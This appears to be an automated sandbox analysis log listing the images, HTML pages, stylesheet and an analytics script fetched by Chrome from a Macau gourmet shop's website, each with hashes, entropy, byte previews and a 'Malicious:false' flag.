                                                                                                                                                              SSDEEP:48:Kih8q8/dv2WvBQl6OFGTuSZdru3CFhOQ9KU9X:cq8l2lLAT7ruSLOQ9ZX
                                                                                                                                                              MD5:FFCA074C7AE68DA9E43B413C48B970EE
                                                                                                                                                              SHA1:6D780B288A01F5643E07CB71721844EF02BC2ECE
                                                                                                                                                              SHA-256:AD3C70515929998D944EA4E7A766F70E1B0C96F6BC172EF37B10C5108FEAA503
                                                                                                                                                              SHA-512:20CCF3207D9D494EA8424EC42F74BC97D60E37A158D729057F023715EAE196E979532AFF44A9D7A07B41F5E70FD5EDCED714541E057C861577B189D0D6FC94BD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/title_aboutus.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................D................................................................................................!1"2B$A#.QaR.43C.d.u&F7........................!1"..Aa2Qq..B#....Rb3...r.C$..5............?.........=o-U.t./.Qf..*@]T...."b:.R..@2..>.)S.a,T....01..@/....8..(s.....`...A..0A..#..W.W\.OC..X.z8Iy.....QU..X.&.I..S.[r...DD...y...96uT%yFSH..V.......@.,..7F...P....c.I..s..L.z.@g<bp..`E.E6..............'~z.2..~|....eE8...R.D.#LM. *.c.y.....)......%T....e..,s.E..jYA.`|w.E@TB...(....bQ.<...j.p.;i.MA[M.=.........n.8..:..x...K...3.I.d.g.y.f...gJ..+53.TL.9.;..0v.w.s.a..e...*l.i....!IP..EB.....'...R.@$`....*.5.<S.KA.)rY4...9EE...`....d...Q..0..d./~;9.........L.1F "JC[`)&....`.5K.X$6......T.0.r9.S.9].......(..&h.Vt.P......P..l../'M.N.&d..........)KS.[....aP..O.8...._.x..}..w.....\J>....(R
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=350, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=160], baseline, precision 8, 160x350, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):96268
                                                                                                                                                              Entropy (8bit):7.875688036056294
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:LYDOgn0YDOgntEYo4P2fqeBDlostkRiS6ILPz9aLNUUPWuU1pAHL87Pc3Bg4Fbc:LYKm0YKmZt2nBDHkQS6iz9EU1JpAnG4a
                                                                                                                                                              MD5:0C8EFD396D3CBAB7581CD0C570E04010
                                                                                                                                                              SHA1:9964126636A09578B099A0631353B8D9C86ED327
                                                                                                                                                              SHA-256:0C79E1E022F2431368EC050EE10F4ACBD7CD0AD817291CB2062B1A40FC13E308
                                                                                                                                                              SHA-512:6F166FA586BB51706C8CC745F1727F4FCA6B8BC185334E0C33214C7BB291778651BACF253D7C47CCD1A13DF794138F621D1106CD8C8AAB5A3C5E9D0AF605C0BD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/indexpic01.jpg
                                                                                                                                                              Preview:....#.Exif..MM.*...........................^...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:05:28 11:34:01.............0221...................................^...............................n...........v.(.....................~.........."n.......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 10x11, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):513
                                                                                                                                                              Entropy (8bit):5.873431397581673
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:3llVuiPjlXJYhg5suRd8f90kmM+ROtCXQxmtHBhGtJflIbDDx9V9wztIfGeDqigW:V/XPYhiPRd81kNbthOE5aPRkn
                                                                                                                                                              MD5:2E7AB3161302C7A40FF6B8ACE9C58EA1
                                                                                                                                                              SHA1:CA52081E5FF446EF9B18C3D19E4E746E350BAF91
                                                                                                                                                              SHA-256:D077696833B4F5C0AE49D1DAF02C3E5F51CA2929350F813988872187DDC5DF4B
                                                                                                                                                              SHA-512:928292522213E30DBAABDE3CB51D0DDB5ACC7EF06737EDA91559DDC14BC0EEE1A45BC1AD3CA1D5BDA5D1F0B7B255840E857D066D736FA31BDD80226BF1A76E8F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/SysImages/Prev.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d......................................................................................................................................................................................................................................3...!1Q"d62bS..$T........................1Qaq!A....."R..3..............?...TDP.(.F..Q.Z.....Q.AK.Ja.QP.......+..K%d;......Gr...N.1.R..^@.N....\.....R.....Gv.n...x<....z..]6..d...+....Ja.V....y..m.igA...g.c.!...../._j.........
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (388)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):4700
                                                                                                                                                              Entropy (8bit):5.321312499961205
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:s5JO5+Za7JzDjsfYaBl2tKEYZ2Sh61cz+76ZB8KrTHV:s5JOAZoJLsbb2JYZ2SQ1v7MB8KrT1
                                                                                                                                                              MD5:5C3AC0CE2ECB26057AFA2998501238A2
                                                                                                                                                              SHA1:A84F61C9C6AAC84B01A5AEFDF1A43610F6A28172
                                                                                                                                                              SHA-256:A4FFC5DF4DEA898F959A2FB7733E61582D6629C477E6AA77BD6F4168878F208E
                                                                                                                                                              SHA-512:E5B4057FD027AC53B744E666BC479DA3DEDB1A962266215CF557A392960CFCC8F50EDAE55F00600A5EFC572800C43CFA68F65596333A14DC6D93F287BD6C1176
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://www.tbty20000.com/tb.js
                                                                                                                                                              Preview:.var _hmt = _hmt || [];.(function() {. var hm = document.createElement("script");. hm.src = "https://hm.baidu.com/hm.js?3eff88a357a8c5aca6bb583a65de2875";. var s = document.getElementsByTagName("script")[0]; . s.parentNode.insertBefore(hm, s);.})();....(function(){. var bp = document.createElement('script');. var curProtocol = window.location.protocol.split(':')[0];. if (curProtocol === 'https') {. bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';. }. else {. bp.src = 'http://push.zhanzhang.baidu.com/push.js';. }. var s = document.getElementsByTagName("script")[0];. s.parentNode.insertBefore(bp, s);.})();..(function(){.var src = "https://jspassport.ssl.qhimg.com/11.0.1.js?d182b3f28525f2db83acfaaf6e696dba";.document.write('<script src="' + src + '" id="sozz"><\/script>');.})();...(function(){...var canonicalURL, curProtocol;...//Get the tag...var x=document.getElementsByTagName("link");...//Find the last canonical URL...if(x.length > 0){..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):43
                                                                                                                                                              Entropy (8bit):3.0950611313667666
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                              MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                              SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                              SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                              SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=350, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=160], baseline, precision 8, 160x350, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):86879
                                                                                                                                                              Entropy (8bit):7.855292974065513
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:PjqhjtxjqhjtKE60RzA/1cq5ul4smdhMY57+jgYrP/gv9oDm0:PuhLuhdR0/1wlMp+jgYzgv9Ym0
                                                                                                                                                              MD5:A0B53839D78FDEB7E4D5383ED0C3232E
                                                                                                                                                              SHA1:B9E0F2E0B6EF0A27FCAB2AF18E429AA515A3813B
                                                                                                                                                              SHA-256:7CC52F07C250BA0247836F870DABE04B7B2724849231DEB8D92CD30CFE8EA539
                                                                                                                                                              SHA-512:906F939D11D5F7DDF6475093F87ACEA92D20637DE56A25BE718D4C46BD98992B3674E6863FCB547A8DDAD0C59DCC4D943FB2B2E2A6809221BDE15BE7A0631067
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/indexpic04.jpg
                                                                                                                                                              Preview:......Exif..MM.*...........................^...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:05:28 11:34:23.............0221...................................^...............................n...........v.(.....................~...................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 185x55, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):7351
                                                                                                                                                              Entropy (8bit):7.941270281650335
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:5YgYgYML24Wul8oRKbRp4d8eEmtHs0SVB2vDDvDDG:5jjl2kl8HPLhIHszVBu/2
                                                                                                                                                              MD5:1C365D663D4CA30154AD5F26052B1E6C
                                                                                                                                                              SHA1:06A09871C2F6DB3D080797ADC2BC395806AB713F
                                                                                                                                                              SHA-256:BFEBD21EAF0F7B7E7BF82C38F8C1C0C9CA877466BB5A03ADE67EDC60D9E08B53
                                                                                                                                                              SHA-512:C0BE7B24EC37E42807B7D467BBD9CE91620124D0BAC7284C50AFBEF65ACB0DB25A678A9FD16FBA426D5F3E05EE965AB1AF9C1FD1940046C4A57DF9042FE43ABE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................7...............................................................................................!..1.a."...U..W..AQq2..#.b...Br...$T.......................!..1AQ....aq"R.T....2...#..B.r3s.$...Sc.4............?...Qz.wj.2.e.......=..........xu.^..5UM[.0.m....ejRl_lv......m....!WSd.....w..8z........../......ww.?..un......~~............un..;!.......su^a.;..z..N..>'d>...z>.n..?.w~.RsI.....W.?.G...y......Ni:.`....j.....9..0.....=I.'V.....m^..=.G7U.....9....vC.........ww..'4.[.|N.}.{...}..W........v......~~............un..;!.......su^a.;..z..N..>'d>...z>.n..?.w~.RsI.....W.?.G...y......Ni:.`....j.....9..0.....=I.'V.....m^..=.G7U.....9....vC.........ww..'4.[.|N.}.{...}..W........v......~~............un..;!.......su^a.;..z..N..>'d>...z>.n..?.w~.RsI..X.vD.6I.]...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 90x28, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1961
                                                                                                                                                              Entropy (8bit):7.670705224455735
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:Ki8U6Zvd5frWUZnI6LccKQBPxzGOtH6DGvW4qoKVLW:+UyTDWmZLfhHFjea
                                                                                                                                                              MD5:B4D0178E44E4245DB87565F22583CB35
                                                                                                                                                              SHA1:ADFE63DDEA3BA209B8D6FC3346003257E538A8CD
                                                                                                                                                              SHA-256:1A3830877E8D875A6700D77A2977A49FE4714667A5BB1C8803C9F0B3C7C1D48F
                                                                                                                                                              SHA-512:920F4AB1059FE218DB412559C05BD819F01F2F41A004A6B5659F47284FCEAA350DD77CC6361915B01D0ED8F5FA92338901551124355A1B75AE10DBE834452E34
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/menu04b.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................Z.........................................................................................!"..1A2..Qa........................!1.A..Qa"q.2..B..Rb#.............?.....R.)K../..R.)K..I4I..."!.. .......7+..z.#.Ej..zs#atUfR.L........u..Q..:._.)....R.....c.qsz..s........0G.2.;..8mr.^..]....Xr......W|.Y....!Cn..1.l.W...D.,}...f...y.Z..>|.X3K\J.a..5..Ek.J......5.Xp..=.3. ..~...v's.....;......8<..pY.'..rgW,.8j.L[..(Z.}..._.y..xL....0..n..4.O.g.TL@.=g..,2.b...\\...A.i. .V..x...~ioO...9..G....n_.;..(.F.....Ev..;.L..U.m..fe.......z..9.C#M,Lk.X.+.s:V...<.w.q.............RW.20$.3..Ul...B..l.......]":.rJdP.T.h..*..!*.Tkko9......r.>...K.P>0...7O@6..j...z/_kR#C.G'$=`....S..d..%$7Gi.-..#.P./../..2. ...M....Z.n..H!.......5e6.^....E\.<2k.$..)D.-,S.5.#D.s|.T.1...j.o.........fa$]*
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:gzip compressed data, truncated
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):23
                                                                                                                                                              Entropy (8bit):1.5342190211803406
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:FttTt:XtTt
                                                                                                                                                              MD5:F0D79988B7772C003D04A28BD7417A62
                                                                                                                                                              SHA1:58423A999EEC2997BCFFFB247E9ECD3DFD0ABF44
                                                                                                                                                              SHA-256:30E6FA98FB48C2B132824D1AC5E2243C0BE9E9082FF32598D34D7687CA7F6C7F
                                                                                                                                                              SHA-512:1D497009F3AABD230BCD055EF09FD180E63E330C47F4C1AFDFC36172E5421A220B78E3E3CE30C9AE533C516ACCFA8976FD3F1198BD15FF79373D5FE87FC64CD2
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:.......................
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 10x11, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):506
                                                                                                                                                              Entropy (8bit):5.858666483670514
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:V/XPYhiPRd81kptl6ox9xKNuqQITub6II:dkiPo1khx9xKNpdKO
                                                                                                                                                              MD5:419602D708E34B5BC16F2C6F24EEB19E
                                                                                                                                                              SHA1:5C809DBC48378C335D734CFCC9A1A5A90B162E92
                                                                                                                                                              SHA-256:993331020514C2059EF960D7B2EA947E4A81FDD5A23E18AA3CE81E5ADC66A665
                                                                                                                                                              SHA-512:19F23FFFBF97E64C43AF1C24905A4F38744EB0854C1ABC487D8652CC0080C226FC7B9AA900BCE54D61BDD9CCE0381243B90C32D9356CD29AA47063F7291CB210
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................................}...................................................................3...1Qd6.!"2bS..$T....................!1...Qa....3.q."R.............?...P.]\.t.;&..O.t.H.Z.AN..=J....#...d....0....d.....Q,(..i.....=X...S.F&.!.dsn..7.....e.53V{k...-'5...xR....t.t.;...n.K:..,/?{..>....%...Z..6.v.@...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):15690
                                                                                                                                                              Entropy (8bit):6.168278522653471
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:3IViTV46IJZ6CYqICZPBsM4qdWlIKKbLCmeniXCGajIPViXBSZRUIoR6mJ8OUsze:3IwGxYZCZKP4WOgniXPdix6roRTJH3Ar
                                                                                                                                                              MD5:247565AD810C057AC717117F3B37D318
                                                                                                                                                              SHA1:102B5A647B19873F6B0BBD8DDCDC9A7975B4EA62
                                                                                                                                                              SHA-256:F70051C2C348C5B73348E300F128794EA3AAF01C9BBF8BCDD05B5F31CFCFCA38
                                                                                                                                                              SHA-512:5E954EBFF7D18C04BB3A9445B3A82A6FE6C8622732631AB8F7FC961037FC63501A00F134B97BF72FC6AADB5C4CB17F2957D434E998568256049392203A846B16
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/OurChocology.asp
                                                                                                                                                              Preview:..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />..<title>Gourmet House Macau Ltd</title>..<link href="main.css" rel="stylesheet" type="text/css" />..<link href="fenye.css" rel="stylesheet" type="text/css" />..<script type="text/JavaScript">.. ..function MM_swapImgRestore() { //v3.0.. var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;..}....function MM_preloadImages() { //v3.0.. var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();.. var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++).. if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}..}....function MM_findObj(n, d) { //v4.01.. var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {.. d=parent.frames[n.substring(p
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 68x20, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1686
                                                                                                                                                              Entropy (8bit):7.617394597360595
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:Kih8q8/dv2WvBQl6OFGTuSZdru3CFhOQ9KU9X:cq8l2lLAT7ruSLOQ9ZX
                                                                                                                                                              MD5:FFCA074C7AE68DA9E43B413C48B970EE
                                                                                                                                                              SHA1:6D780B288A01F5643E07CB71721844EF02BC2ECE
                                                                                                                                                              SHA-256:AD3C70515929998D944EA4E7A766F70E1B0C96F6BC172EF37B10C5108FEAA503
                                                                                                                                                              SHA-512:20CCF3207D9D494EA8424EC42F74BC97D60E37A158D729057F023715EAE196E979532AFF44A9D7A07B41F5E70FD5EDCED714541E057C861577B189D0D6FC94BD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................D................................................................................................!1"2B$A#.QaR.43C.d.u&F7........................!1"..Aa2Qq..B#....Rb3...r.C$..5............?.........=o-U.t./.Qf..*@]T...."b:.R..@2..>.)S.a,T....01..@/....8..(s.....`...A..0A..#..W.W\.OC..X.z8Iy.....QU..X.&.I..S.[r...DD...y...96uT%yFSH..V.......@.,..7F...P....c.I..s..L.z.@g<bp..`E.E6..............'~z.2..~|....eE8...R.D.#LM. *.c.y.....)......%T....e..,s.E..jYA.`|w.E@TB...(....bQ.<...j.p.;i.MA[M.=.........n.8..:..x...K...3.I.d.g.y.f...gJ..+53.TL.9.;..0v.w.s.a..e...*l.i....!IP..EB.....'...R.@$`....*.5.<S.KA.)rY4...9EE...`....d...Q..0..d./~;9.........L.1F "JC[`)&....`.5K.X$6......T.0.r9.S.9].......(..&h.Vt.P......P..l../'M.N.&d..........)KS.[....aP..O.8...._.x..}..w.....\J>....(R
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1150), with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):13694
                                                                                                                                                              Entropy (8bit):5.386423805885703
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:3IViTV66IJZ6CYqICZPBsW4idWlIKKaimdTmhymnEERwYTfLFmM6m57G0La0U54o:3IwExYZCZKJgWOnTjF55ZAr
                                                                                                                                                              MD5:6027ED32B45E491FEA4A4868B606A27F
                                                                                                                                                              SHA1:2877FD695E476AB99AF48F5CDB3A990472E6769D
                                                                                                                                                              SHA-256:251C652670FC76AA7018AC91CABE3E9D599DA179DF55B8786D78935FEC22B2CB
                                                                                                                                                              SHA-512:CD12471B28C92109A2CA56C1F10492D7F351C3114F63BB222952B45CD65739ABA19B8616D9661CDA3E89827D8F80185484737AE9B027DFF2B08092B188164226
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/OurProducts.asp
                                                                                                                                                              Preview:..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />..<title>Gourmet House Macau Ltd</title>..<link href="main.css" rel="stylesheet" type="text/css" />..<link href="fenye.css" rel="stylesheet" type="text/css" />..<script type="text/JavaScript">.. ..function MM_swapImgRestore() { //v3.0.. var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;..}....function MM_preloadImages() { //v3.0.. var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();.. var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++).. if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}..}....function MM_findObj(n, d) { //v4.01.. var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {.. d=parent.frames[n.substring(p
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=350, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=160], baseline, precision 8, 160x350, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):97469
                                                                                                                                                              Entropy (8bit):7.875204428572194
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:CArTSArT3E5ZeWJW+ro2D0/kKobA3ZI9VTwtkJHrGZuTXzSqjZSVKhXR8g:CArOAr+e+IVszA3ZI9V2wrGZuTnZxlRb
                                                                                                                                                              MD5:8FD0B31FBDA24A1AC68FDDA8B6DF89F1
                                                                                                                                                              SHA1:8786A2FC8A46377DBBFF0D76036527F83CB60348
                                                                                                                                                              SHA-256:FF34FB1F66E26D0D3C847056D7A71CDEC8C0E401B73C636C1B82A94EA3EBA8B2
                                                                                                                                                              SHA-512:02AB6477AB127398D13C2366CE54E6ABC1D4CCA7B2B92F1517B2F210B238DE3BCE25B292E462C2CCE13871125F6719C3664E0BFC0AC6F5DCD4D3410BBBC08B8C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:.... .Exif..MM.*...........................^...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:05:28 12:02:39.............0221...................................^...............................n...........v.(.....................~...................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):2297
                                                                                                                                                              Entropy (8bit):5.216138318540726
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:q0JZ0cEixYNJZv5xJZ0M2kJZ0JJZ0AJZ07Y1rOOS8JZ0QwJZ0xMJZrJZ07cBJZ5B:q0J1bEJvxJ3JWJPJP1rOOS8JYJBJdJLn
                                                                                                                                                              MD5:5151C548E87CACFEE6672E47DDFD388A
                                                                                                                                                              SHA1:9F36DE98583AB66356EB20C25FD8892FDB3ADFE0
                                                                                                                                                              SHA-256:FC3C19D91C3A297EB51D0F968F20789341047E288DBA37FB11186142FC83BD5C
                                                                                                                                                              SHA-512:9168BC4D932ED412BA433813433E778AB8392E4C43394C6C55F00A32F54AE9F9DE45E73D70CB0B4C5C59019DA8AF7302CDCAA6D633F1F11B06C7A722EF15E96F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/main.css
                                                                                                                                                              Preview:@charset "utf-8";..body {...font-family: Tahoma, Arial, Helvetica, sans-serif;...font-size: 12px;...line-height: 18px;...color: #999999;...background-color: #ECE6D6;...margin: 0px;...padding: 0px;..}..#maintab{...width:970px;...margin:0 auto;...padding:0 17px;...background:#FFFFFF;..}...copyright {...font-family: Tahoma, Arial, Helvetica, sans-serif;...font-size: 11px;...line-height: 43px;...color: #999966;...background-image: url(images/copyrightbg.jpg);...background-repeat: no-repeat;..}...indexNew {...font-family: Tahoma, Arial, Helvetica, sans-serif;...font-size: 12px;...line-height: 20px;...color: #FFFFFF;...padding:0 10px;...text-align: justify;..}...text01 {...font-family: Tahoma, Arial, Helvetica, sans-serif;...font-size: 12px;...line-height: 24px;...color: #999;..}...text02 {...font-family: Tahoma, Arial, Helvetica, sans-serif;...font-size: 12px;...line-height: 24px;...color: #666;..}...news {...font-family: Tahoma, Arial, Helvetica, sans-serif;...font-size: 12px;...line-heigh
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 40x28, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):888
                                                                                                                                                              Entropy (8bit):7.033052540621042
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:dkiPojXUlHSSmL0ecu0rBe8XFho+fSbNa:Ki8kB+70x3
                                                                                                                                                              MD5:14B4ECF448E6CAF03AE0CEE94EDC88A6
                                                                                                                                                              SHA1:10F5C090B60FEC0ABEDAB2976E41A46E987C642B
                                                                                                                                                              SHA-256:3224CFB3896B46AF199849B05899A1B944D0015738A3FE1C201E3691401FC5C6
                                                                                                                                                              SHA-512:9CD2D8AA7EB884C97531DC3E55EA6C41FF3C79A42EF9816774DCA271D3FBD5840DD2BC2ABCD854AA45F357C6C5D656C0461369107AC8A5601F82C56023980821
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/menu01.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................(.............{.........................................................................".!..1A..a2B......................1!.AQa..q.................?..w...F."7...H..D.g7B.C....|..m....,(~.s...6.x...k........q#8.....}.._c.....u|...C...{..>.%)l....q.V..n........@..Q.5...7....M.....Eil.PL..a...# ..JG.+i..<U..?Z..J.,0..fG._PzJk`=p..=m].....-1..Bc..4...P+..........d...Mc_]$....j..YZ.$..Qk.Z.2.N..}..{.IXP.....'.O.V.......3.......[....C..5>.cbG...9..r..$....B.f........z.....?x...H....= ....% x;2?:....~..^s....I.b..&.O....f.m.l..-...p.PP..m.c.7.}eOz..Gl.nTy...1k~!.=Mq..S>.l..7........e....X......S C..L..m..[..<v.m.cM.)>{%..@?...yj&Q.H.ZDr.#..?..
